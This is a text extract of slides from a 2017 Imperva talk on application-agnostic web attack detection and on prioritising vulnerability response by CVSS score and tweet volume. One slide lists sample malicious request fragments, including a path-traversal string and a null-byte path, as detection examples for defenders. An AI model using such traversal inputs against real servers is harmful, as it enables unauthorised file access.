Upload
imperva-incapsula
View
59
Download
0
Embed Size (px)
Citation preview
2
> ben.childNodes.length<· 2> ben.history<· [“PT”,”Dev”] > ben.employer<· “Imperva”> ben.positionX<· “Research Group Manager”> ben.social<· {“TWT”: “@KernelXSS”, “LNK”: “Ben Herzberg”}
© 2017 Imperva, Inc. All rights reserved.
Our “Ground Rules”
As little config as possible
Focus on low FPs
Use our CDN to cover more AVs
© 2017 Imperva, Inc. All rights reserved.
Being app agnostic…
Example #1: SQL Injection
Queries sent over an application
Pseudo-SQL
“Close Calls”
© 2017 Imperva, Inc. All rights reserved.
Being app agnostic…
Example #2: Cross-Site Scripting
HTML sent as part of request
Javascript sent as part of request
Javascript being… Javascript…
© 2017 Imperva, Inc. All rights reserved.
Being app agnostic…
Example #4: MISC…
GET + Content-Type + Content-Length
/%00/demo/welcome
src=../../../../windows/bannerWindow/a.jpg
PHP in RFI
© 2017 Imperva, Inc. All rights reserved.
Why?
Create a clear process for Vulnerabilities Management
Give our customers an efficient & prioritised vulnerability response procedure
Unified process
© 2017 Imperva, Inc. All rights reserved.
New VR+EF: Scoping
CVSS>9.0 NO AUTH+ = HPC
WEB REMOTE
+ +
10+
TWEETS = HPC
CVSS>7.04+
TWEETS
=
REGULAR+ HAS
EXPLOITORCVSS>8.0
=REGULAR
…
SEC
INTEL. = HPC
© 2017 Imperva, Inc. All rights reserved.
Business Days
HPC REGULAR+
OOS
OOTB
Followup
Mitigation Needed
Emergency Feed
© 2017 Imperva, Inc. All rights reserved.
Weekends
HPC
OOS
OOTB
Followup
Mitigation Needed
Emergency Feed
© 2017 Imperva, Inc. All rights reserved.
30
@KernelXSS, @imperva
Thank You!
Let’s Talk!linkedin.com/in/sysadmin
© 2017 Imperva, Inc. All rights reserved.